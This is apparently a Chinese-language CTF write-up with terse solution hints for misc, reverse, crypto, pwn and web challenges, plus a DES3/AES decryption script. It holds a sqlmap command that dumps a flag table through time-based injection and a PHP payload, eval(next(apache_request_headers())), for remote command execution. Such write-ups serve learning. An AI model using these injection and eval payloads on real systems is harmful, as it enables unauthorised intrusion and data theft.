两张图叠加,010处理下就出来了。
Misc2png的长度设置长一点就出flag
misc3steg 打开,RGB三个最低色道分别来一次,flag组合下就出来了。
Misc4流量包内有jsfuck编码的密码,log文件内有rar文件,拿密码去解压rar文件,就出flag
re1flag直接写在main函数里了。。
re2题目算法似乎有问题,反正我是没解出来,好像有人解出来了- -,真流弊
crypt1直接写出解密脚本
#-*- coding:utf8 -*- from Crypto.Cipher import AES,DES3 from hashlib import md5 def encrypt(): flag=open("flag.txt","rb").read().strip() paclen=8-len(flag)%8 flag+=paclen*(chr(paclen)) key1="do_you_know_des3" obj1=DES3.new(key1,DES3.MODE_ECB) s1=obj1.encrypt(flag) key2="and_you_know_aes" iv=md5(key2).digest() obj2=AES.new(key2,AES.MODE_CBC,iv) s2=obj2.encrypt(s1) with open("flag.enc","wb") as f: f.write(s2) def decrypt(): s1=open("flag.enc","rb").read() key2="and_you_know_aes" iv=md5(key2).digest() obj2=AES.new(key2,AES.MODE_CBC,iv) s2=obj2.decrypt(s1) key1="do_you_know_des3" obj1=DES3.new(key1,DES3.MODE_ECB) flag=obj1.decrypt(s2) print flag decrypt() crypt2Coppersmith攻击了解一下。
pwn1静态编译,ROPgadget了解一下。
pwn2根据0ctf2018 babyheap改的题,把off by one改没了,不知道怎么做= =
web1-web7全是原题,不会做的话,实验吧刷题了解一下。
web8有waf的报错注入,waf只是为了限制考点,很容易绕过
web9格式化字符串,sqlmap了解一下
sqlmap -r post -p username --prefix "%1$'" --suffix "#" -v3 --technique=T -D ctf -T flag --dump
web10命令执行,rctf原题改,getallheaders被禁用了,但是apache_request_headers可以
payload为 eval(next(apache_request_headers()));